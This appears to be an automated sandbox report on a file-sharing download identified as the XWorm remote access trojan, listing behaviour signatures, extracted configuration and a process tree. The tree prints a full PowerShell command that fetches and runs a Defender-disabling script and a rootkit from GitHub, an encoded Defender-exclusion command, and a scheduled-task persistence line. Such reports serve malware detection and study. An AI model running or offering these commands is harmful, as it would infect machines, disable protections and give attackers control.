Overview

overview

10

Static

static

1

URLScan

urlscan

1

https://gofile.io/d/...

windows10-2004-x64

10

Analysis

  • max time kernel
    80s
  • max time network
    83s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20250217-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20250217-enlocale:en-usos:windows10-2004-x64system
  • submitted
    07/03/2025, 15:12

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    https://gofile.io/d/tk7G8D

Score
10/10
xwormbootkitdefense_evasiondiscoveryexecutionpersistencerattrojan

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe
exe.dropper

https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat

Extracted

Family

xworm

Attributes
  • Install_directory

    %port%

  • install_file

    svchost.exe

  • pastebin_url

    https://pastebin.com/raw/J42c6s7r

Signatures

  • Detect Xworm Payload 4 IoCs
  • Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Blocklisted process makes network request 2 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Run Powershell and hide display window.

    execution
  • Disables RegEdit via registry modification 1 IoCs
    defense_evasion
  • Downloads MZ/PE file 2 IoCs
  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 10 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 7 IoCs
  • Obfuscated Files or Information: Command Obfuscation 1 TTPs

    Adversaries may obfuscate content during command execution to impede detection.

    defense_evasion
  • Writes to the Master Boot Record (MBR) 1 TTPs 1 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

    bootkitpersistence
  • Drops file in System32 directory 8 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Drops file in Windows directory 2 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

    discovery
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 5 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Delays execution with timeout.exe 1 IoCs
    defense_evasion
  • Enumerates system info in registry 2 TTPs 6 IoCs
  • Modifies Internet Explorer settings 1 TTPs 2 IoCs
    adwarespyware
  • Modifies data under HKEY_USERS 1 IoCs
  • Modifies registry class 64 IoCs
  • NTFS ADS 1 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 9 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 36 IoCs
  • Suspicious use of SendNotifyMessage 24 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Windows\system32\winlogon.exe
    winlogon.exe
    1⤵
      PID:612
      • C:\Windows\system32\dwm.exe
        "dwm.exe"
        2⤵
          PID:384
        • C:\Windows\System32\dllhost.exe
          C:\Windows\System32\dllhost.exe /Processid:{6ed6e612-631e-4004-b587-92db56d9ccfa}
          2⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:5404
      • C:\Windows\system32\lsass.exe
        C:\Windows\system32\lsass.exe
        1⤵
          PID:676
        • C:\Windows\system32\svchost.exe
          C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
          1⤵
            PID:960
          • C:\Windows\system32\svchost.exe
            C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
            1⤵
              PID:516
            • C:\Windows\System32\svchost.exe
              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
              1⤵
                PID:1048
              • C:\Windows\System32\svchost.exe
                C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
                1⤵
                  PID:1100
                • C:\Windows\system32\svchost.exe
                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
                  1⤵
                    PID:1108
                  • C:\Windows\system32\svchost.exe
                    C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
                    1⤵
                    • Drops file in System32 directory
                    PID:1204
                    • C:\Windows\system32\taskhostw.exe
                      taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
                      2⤵
                        PID:2828
                      • C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe
                        "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
                        2⤵
                        • Executes dropped EXE
                        PID:4508
                    • C:\Windows\System32\svchost.exe
                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
                      1⤵
                        PID:1244
                      • C:\Windows\system32\svchost.exe
                        C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
                        1⤵
                          PID:1280
                        • C:\Windows\system32\svchost.exe
                          C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
                          1⤵
                            PID:1336
                          • C:\Windows\system32\svchost.exe
                            C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
                            1⤵
                              PID:1372
                            • C:\Windows\system32\svchost.exe
                              C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
                              1⤵
                                PID:1400
                                • C:\Windows\system32\sihost.exe
                                  sihost.exe
                                  2⤵
                                    PID:2984
                                • C:\Windows\system32\svchost.exe
                                  C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
                                  1⤵
                                    PID:1496
                                  • C:\Windows\System32\svchost.exe
                                    C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
                                    1⤵
                                      PID:1540
                                    • C:\Windows\system32\svchost.exe
                                      C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
                                      1⤵
                                        PID:1548
                                      • C:\Windows\system32\svchost.exe
                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
                                        1⤵
                                          PID:1680
                                        • C:\Windows\System32\svchost.exe
                                          C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
                                          1⤵
                                            PID:1708
                                          • C:\Windows\System32\svchost.exe
                                            C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
                                            1⤵
                                              PID:1752
                                            • C:\Windows\System32\svchost.exe
                                              C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
                                              1⤵
                                                PID:1804
                                              • C:\Windows\System32\svchost.exe
                                                C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                1⤵
                                                • Modifies Internet Explorer settings
                                                PID:1828
                                                • C:\Windows\system32\AUDIODG.EXE
                                                  C:\Windows\system32\AUDIODG.EXE 0x500 0x4ec
                                                  2⤵
                                                    PID:4228
                                                • C:\Windows\system32\svchost.exe
                                                  C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                                  1⤵
                                                    PID:1948
                                                  • C:\Windows\system32\svchost.exe
                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
                                                    1⤵
                                                      PID:1972
                                                    • C:\Windows\System32\svchost.exe
                                                      C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
                                                      1⤵
                                                        PID:1988
                                                      • C:\Windows\System32\svchost.exe
                                                        C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                                        1⤵
                                                          PID:692
                                                        • C:\Windows\System32\spoolsv.exe
                                                          C:\Windows\System32\spoolsv.exe
                                                          1⤵
                                                            PID:2080
                                                          • C:\Windows\system32\svchost.exe
                                                            C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
                                                            1⤵
                                                            • Suspicious use of AdjustPrivilegeToken
                                                            PID:2120
                                                          • C:\Windows\System32\svchost.exe
                                                            C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
                                                            1⤵
                                                              PID:2160
                                                            • C:\Windows\System32\svchost.exe
                                                              C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
                                                              1⤵
                                                                PID:2280
                                                              • C:\Windows\system32\svchost.exe
                                                                C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
                                                                1⤵
                                                                  PID:2424
                                                                • C:\Windows\system32\svchost.exe
                                                                  C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
                                                                  1⤵
                                                                    PID:2432
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
                                                                    1⤵
                                                                    • Drops file in System32 directory
                                                                    PID:2580
                                                                  • C:\Windows\system32\svchost.exe
                                                                    C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
                                                                    1⤵
                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                    PID:2608
                                                                  • C:\Windows\sysmon.exe
                                                                    C:\Windows\sysmon.exe
                                                                    1⤵
                                                                      PID:2652
                                                                    • C:\Windows\System32\svchost.exe
                                                                      C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
                                                                      1⤵
                                                                        PID:2684
                                                                      • C:\Windows\system32\svchost.exe
                                                                        C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
                                                                        1⤵
                                                                          PID:2732
                                                                        • C:\Windows\system32\wbem\unsecapp.exe
                                                                          C:\Windows\system32\wbem\unsecapp.exe -Embedding
                                                                          1⤵
                                                                            PID:2896
                                                                          • C:\Windows\system32\svchost.exe
                                                                            C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
                                                                            1⤵
                                                                              PID:3004
                                                                            • C:\Windows\system32\svchost.exe
                                                                              C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
                                                                              1⤵
                                                                                PID:3108
                                                                              • C:\Windows\system32\svchost.exe
                                                                                C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
                                                                                1⤵
                                                                                  PID:3436
                                                                                • C:\Windows\Explorer.EXE
                                                                                  C:\Windows\Explorer.EXE
                                                                                  1⤵
                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                  • Suspicious use of AdjustPrivilegeToken
                                                                                  PID:3532
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/tk7G8D
                                                                                    2⤵
                                                                                    • Enumerates system info in registry
                                                                                    • NTFS ADS
                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                    • Suspicious use of FindShellTrayWindow
                                                                                    • Suspicious use of SendNotifyMessage
                                                                                    • Suspicious use of WriteProcessMemory
                                                                                    PID:8
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffd9f3146f8,0x7ffd9f314708,0x7ffd9f314718
                                                                                      3⤵
                                                                                        PID:2456
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2120 /prefetch:2
                                                                                        3⤵
                                                                                          PID:4476
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2184 /prefetch:3
                                                                                          3⤵
                                                                                          • Downloads MZ/PE file
                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                          PID:672
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2764 /prefetch:8
                                                                                          3⤵
                                                                                            PID:4468
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3416 /prefetch:1
                                                                                            3⤵
                                                                                              PID:4536
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3424 /prefetch:1
                                                                                              3⤵
                                                                                                PID:3256
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4712 /prefetch:1
                                                                                                3⤵
                                                                                                  PID:1132
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 /prefetch:8
                                                                                                  3⤵
                                                                                                    PID:540
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4952 /prefetch:8
                                                                                                    3⤵
                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                    PID:1812
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5364 /prefetch:1
                                                                                                    3⤵
                                                                                                      PID:1288
                                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5380 /prefetch:1
                                                                                                      3⤵
                                                                                                        PID:2012
                                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4212 /prefetch:1
                                                                                                        3⤵
                                                                                                          PID:3260
                                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5564 /prefetch:1
                                                                                                          3⤵
                                                                                                            PID:3192
                                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5780 /prefetch:1
                                                                                                            3⤵
                                                                                                              PID:3364
                                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5520 /prefetch:8
                                                                                                              3⤵
                                                                                                                PID:1788
                                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4208 /prefetch:1
                                                                                                                3⤵
                                                                                                                  PID:912
                                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6168 /prefetch:8
                                                                                                                  3⤵
                                                                                                                    PID:4516
                                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=2108,11618903153967797651,2164231285430042672,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5532 /prefetch:8
                                                                                                                    3⤵
                                                                                                                    • Suspicious behavior: EnumeratesProcesses
                                                                                                                    PID:5212
                                                                                                                  • C:\Users\Admin\Downloads\BootstrapperNew.exe
                                                                                                                    "C:\Users\Admin\Downloads\BootstrapperNew.exe"
                                                                                                                    3⤵
                                                                                                                    • Checks computer location settings
                                                                                                                    • Executes dropped EXE
                                                                                                                    • Drops file in Windows directory
                                                                                                                    • System Location Discovery: System Language Discovery
                                                                                                                    • Suspicious use of SetWindowsHookEx
                                                                                                                    PID:5336
                                                                                                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
                                                                                                                      4⤵
                                                                                                                      • System Location Discovery: System Language Discovery
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      PID:5548
                                                                                                                    • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
                                                                                                                      "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
                                                                                                                      4⤵
                                                                                                                      • Executes dropped EXE
                                                                                                                      PID:5652
                                                                                                                    • C:\Windows\Credential Guard & VBS Key Isolation.exe
                                                                                                                      "C:\Windows\Credential Guard & VBS Key Isolation.exe"
                                                                                                                      4⤵
                                                                                                                      • Checks computer location settings
                                                                                                                      • Executes dropped EXE
                                                                                                                      • Adds Run key to start application
                                                                                                                      • Suspicious behavior: EnumeratesProcesses
                                                                                                                      • Suspicious use of AdjustPrivilegeToken
                                                                                                                      • Suspicious use of FindShellTrayWindow
                                                                                                                      PID:5756
                                                                                                                      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -ExecutionPolicy Bypass -Command "$settings = '{\"WD\": false, \"adminrun\": false}' | ConvertFrom-Json; $randomString = \"2PewmOBXXq\"; if ($settings.WD) { $settings.adminrun = $true; (New-Object System.Net.WebClient).DownloadFile(\"https://raw.githubusercontent.com/ninhpn1337/Disable-Windows-Defender/main/source.bat\", $env:TEMP + '\' + $randomString + '.bat'); Start-Process -FilePath ($env:TEMP + '\' + $randomString + '.bat') -WindowStyle Hidden -Wait -Verb RunAs; }; if ($settings.adminrun) { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath -Verb RunAs; } else { $url = \"https://github.com/charlie-60/R/raw/refs/heads/main/MasonRootkit.exe\"; $outputPath = $env:TEMP + '\' + 'MasonRootkit.exe'; (New-Object System.Net.WebClient).DownloadFile($url, $outputPath); Start-Process $outputPath; }"
                                                                                                                        5⤵
                                                                                                                        • Blocklisted process makes network request
                                                                                                                        • Command and Scripting Interpreter: PowerShell
                                                                                                                        • Downloads MZ/PE file
                                                                                                                        • Suspicious behavior: EnumeratesProcesses
                                                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                                                        PID:5144
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\MasonRootkit.exe"
                                                                                                                          6⤵
                                                                                                                          • Checks computer location settings
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:3424
                                                                                                                          • C:\ProgramData\MasonRootkit.exe
                                                                                                                            "C:\ProgramData\MasonRootkit.exe"
                                                                                                                            7⤵
                                                                                                                            • Suspicious use of NtCreateUserProcessOtherParentProcess
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Suspicious use of SetThreadContext
                                                                                                                            • Suspicious behavior: EnumeratesProcesses
                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                            PID:5140
                                                                                                                          • C:\Windows\system32\cmd.exe
                                                                                                                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\tmpEE0.tmp.bat""
                                                                                                                            7⤵
                                                                                                                              PID:5236
                                                                                                                              • C:\Windows\System32\Conhost.exe
                                                                                                                                \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                                8⤵
                                                                                                                                  PID:5900
                                                                                                                                • C:\Windows\system32\timeout.exe
                                                                                                                                  timeout 3
                                                                                                                                  8⤵
                                                                                                                                  • Delays execution with timeout.exe
                                                                                                                                  PID:5320
                                                                                                                          • C:\Windows\System32\schtasks.exe
                                                                                                                            "C:\Windows\System32\schtasks.exe" /create /f /sc minute /mo 1 /tn "Credential Guard & VBS Key Isolation" /tr "C:\Users\Admin\AppData\Roaming\Credential Guard & VBS Key Isolation.exe"
                                                                                                                            5⤵
                                                                                                                            • Scheduled Task/Job: Scheduled Task
                                                                                                                            PID:6020
                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\Pendulum.exe
                                                                                                                            "C:\Users\Admin\AppData\Local\Temp\Pendulum.exe"
                                                                                                                            5⤵
                                                                                                                            • Disables RegEdit via registry modification
                                                                                                                            • Executes dropped EXE
                                                                                                                            • Writes to the Master Boot Record (MBR)
                                                                                                                            • System Location Discovery: System Language Discovery
                                                                                                                            PID:5528
                                                                                                                      • C:\Users\Admin\Downloads\BootstrapperNew.exe
                                                                                                                        "C:\Users\Admin\Downloads\BootstrapperNew.exe"
                                                                                                                        3⤵
                                                                                                                        • Checks computer location settings
                                                                                                                        • Executes dropped EXE
                                                                                                                        • Drops file in Windows directory
                                                                                                                        • System Location Discovery: System Language Discovery
                                                                                                                        • Suspicious use of SetWindowsHookEx
                                                                                                                        PID:5428
                                                                                                                        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAZAB4ACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHgAeABtACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGoAdgBuACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAG4AYwB4ACMAPgA="
                                                                                                                          4⤵
                                                                                                                          • System Location Discovery: System Language Discovery
                                                                                                                          • Suspicious behavior: EnumeratesProcesses
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5540
                                                                                                                        • C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe
                                                                                                                          "C:\Users\Admin\AppData\Local\Temp\BootstrapperNew.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          PID:5636
                                                                                                                        • C:\Windows\Credential Guard & VBS Key Isolation.exe
                                                                                                                          "C:\Windows\Credential Guard & VBS Key Isolation.exe"
                                                                                                                          4⤵
                                                                                                                          • Executes dropped EXE
                                                                                                                          • Suspicious use of AdjustPrivilegeToken
                                                                                                                          PID:5712
                                                                                                                  • C:\Windows\system32\svchost.exe
                                                                                                                    C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
                                                                                                                    1⤵
                                                                                                                      PID:3632
                                                                                                                    • C:\Windows\system32\DllHost.exe
                                                                                                                      C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
                                                                                                                      1⤵
                                                                                                                        PID:3832
                                                                                                                      • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                        C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                        1⤵
                                                                                                                          PID:4060
                                                                                                                        • C:\Windows\System32\RuntimeBroker.exe
                                                                                                                          C:\Windows\System32\RuntimeBroker.exe -Embedding
                                                                                                                          1⤵
                                                                                                                          • Suspicious use of UnmapMainImage
                                                                                                                          PID:3960
                                                                                                                        • C:\Windows\System32\svchost.exe
